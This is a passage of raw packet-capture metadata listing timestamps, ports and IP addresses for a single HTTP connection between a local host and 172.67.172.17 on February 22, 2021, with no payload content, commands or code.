Feb 22, 2021 09:14:49.347836971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347855091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347871065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347887039 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347903013 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347918987 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347934961 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347938061 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347950935 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347970009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347970009 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.347982883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.347992897 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348000050 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348016024 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348022938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348031998 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348051071 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348052025 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348094940 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348788977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348812103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348829031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348839998 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348845005 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348865032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348871946 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348881960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348893881 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.348901987 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.348936081 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375569105 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375597954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375617027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375634909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375650883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375658035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375663996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375679970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375686884 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375698090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375714064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375725031 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375727892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375771999 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375802994 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375811100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375827074 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375844002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375859022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375874996 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375880003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375890970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375911951 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375921011 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375930071 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375946045 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375962019 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375972033 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.375977993 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375993967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.375994921 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376010895 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376025915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376044989 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376053095 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376137018 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376766920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376785994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376801968 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376817942 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376833916 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376835108 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376851082 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376862049 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376866102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376883030 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376892090 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376902103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376916885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.376920938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.376950026 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377336979 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377358913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377376080 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377404928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377414942 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377420902 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377437115 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377451897 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377460003 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377471924 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377489090 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377499104 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377506018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377521992 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377528906 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377537966 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377552032 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.377595901 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.377681017 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399270058 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399300098 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399319887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399332047 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399344921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399358034 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399370909 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399384022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399395943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399408102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399427891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399446011 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399458885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399461985 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399470091 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399490118 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399502039 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399549961 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399590015 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399606943 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399624109 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399638891 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399648905 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399658918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399676085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399681091 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399692059 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399708033 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399724960 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399729013 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399738073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.399758101 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.399801970 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.400271893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400291920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400310040 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400326967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400342941 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400357962 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400366068 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.400373936 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400391102 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400409937 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400417089 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.400427103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400441885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400445938 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.400466919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400484085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400499105 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400515079 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.400533915 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.400573015 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.401179075 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401206970 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401223898 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401238918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401257038 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401268959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401284933 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401304007 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401319027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401319027 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.401335001 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401350021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.401416063 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.401423931 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732491016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732537031 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732559919 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732582092 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732603073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732625961 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732626915 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732647896 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732649088 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732670069 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732671976 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732692003 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732712984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732732058 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732732058 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732750893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732764959 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732770920 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732791901 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732815027 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732816935 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732861042 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732880116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732901096 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732920885 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732940912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732949972 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732963085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.732974052 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.732985020 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733006954 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733012915 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733026981 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733047009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733051062 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733064890 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733110905 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733510971 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733541012 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733566999 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733589888 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733609915 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733623028 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733633995 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733643055 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733656883 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733671904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733680010 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733701944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733702898 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733724117 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733747959 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733747959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733773947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733787060 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733794928 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733817101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733838081 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.733840942 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.733882904 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734473944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734503984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734529018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734550953 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734572887 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734594107 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734599113 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734616041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734623909 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734637022 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734647989 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734658957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734684944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734687090 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734709978 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734731913 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734731913 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734751940 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734771967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734787941 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.734791994 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.734824896 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:49.735397100 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:49.737961054 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.063497066 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063534021 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063553095 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063572884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063594103 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063611984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.063657045 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.063716888 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.172235012 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172272921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172298908 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172311068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172326088 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172338009 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172353983 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172365904 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172369957 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.172382116 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172394991 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172414064 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172426939 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172440052 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172451973 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.172489882 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.172507048 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.173283100 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204031944 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204051018 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204063892 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204086065 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204103947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204127073 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204144955 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204158068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204174042 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204185963 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204197884 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204201937 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204210997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204222918 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204222918 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204237938 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204319000 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204325914 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204355955 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204369068 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204390049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204406977 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.204483032 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.204489946 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234584093 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234616041 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234657049 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234678984 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234705925 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234726906 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234752893 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234750986 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234771967 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234774113 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234775066 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234795094 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234822035 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234843016 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234846115 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234863997 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234885931 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234906912 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234910965 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234915018 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.234929085 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234967947 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.234983921 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.235003948 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.235017061 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.235033035 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.235038042 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.239284992 CET	49761	80	192.168.2.4	172.67.172.17
Feb 22, 2021 09:14:50.279652119 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279680967 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279709101 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279726028 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279742002 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279757023 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279778957 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279794931 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279814959 CET	80	49761	172.67.172.17	192.168.2.4
Feb 22, 2021 09:14:50.279829979 CET	80	49761	172.67.172.17	192.168.2.4
